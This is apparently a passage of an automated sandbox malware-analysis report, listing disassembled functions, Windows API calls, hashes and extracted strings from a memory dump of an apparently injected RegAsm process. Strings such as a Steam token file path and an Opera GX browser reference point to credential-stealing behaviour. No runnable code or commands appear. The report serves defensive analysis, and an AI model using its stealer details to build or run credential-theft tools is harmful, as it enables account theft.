                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                        • String ID: Opera GX
                                                                                                        • API String ID: 1719890681-3280151751
                                                                                                        • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                        • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                        • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                        • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                        Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-3916222277
                                                                                                        • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                        • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                        • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                        • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                        Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Strings
                                                                                                        • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                        • String ID: Soft\Steam\steam_tokens.txt
                                                                                                        • API String ID: 502913869-3507145866
                                                                                                        • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                        • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                        • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                        • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                        Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocLocal
                                                                                                        • String ID: 1iA
                                                                                                        • API String ID: 3494564517-1863120733
                                                                                                        • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                        • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                        • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                        • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                        Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                        • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                        • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                        • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                        Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • malloc.MSVCRT ref: 0041CBC9
                                                                                                          • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                          • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                          • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                        • malloc.MSVCRT ref: 0041CC06
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: malloc$lstrcpylstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2974738957-0
                                                                                                        • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                        • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                        • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                        • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                        Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                        • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
                                                                                                        • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                        • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                        Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                        • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                                        • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                        • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                                        Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1699248803-0
                                                                                                        • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                        • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                                        • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                        • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                                        Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                        • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                                        • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                        • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                                        Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2803490479-0
                                                                                                        • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                        • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                        • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                        • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

                                                                                                        Non-executed Functions

                                                                                                        Function 6C0A6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0A6CCC
                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0A6D11
                                                                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C0A6D26
                                                                                                          • Part of subcall function 6C0ACA10: malloc.MOZGLUE(?), ref: 6C0ACA26
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C0A6D35
                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0A6D53
                                                                                                        • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C0A6D73
                                                                                                        • free.MOZGLUE(00000000), ref: 6C0A6D80
                                                                                                        • CertGetNameStringW.CRYPT32 ref: 6C0A6DC0
                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C0A6DDC
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0A6DEB
                                                                                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C0A6DFF
                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C0A6E10
                                                                                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C0A6E27
                                                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C0A6E34
                                                                                                        • CreateFileW.KERNEL32 ref: 6C0A6EF9
                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C0A6F7D
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0A6F8C
                                                                                                        • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C0A709D
                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0A7103
                                                                                                        • free.MOZGLUE(00000000), ref: 6C0A7153
                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C0A7176
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A7209
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A723A
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A726B
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A729C
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A72DC
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A730D
                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0A73C2
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A73F3
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A73FF
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A7406
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A740D
                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0A741A
                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C0A755A
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0A7568
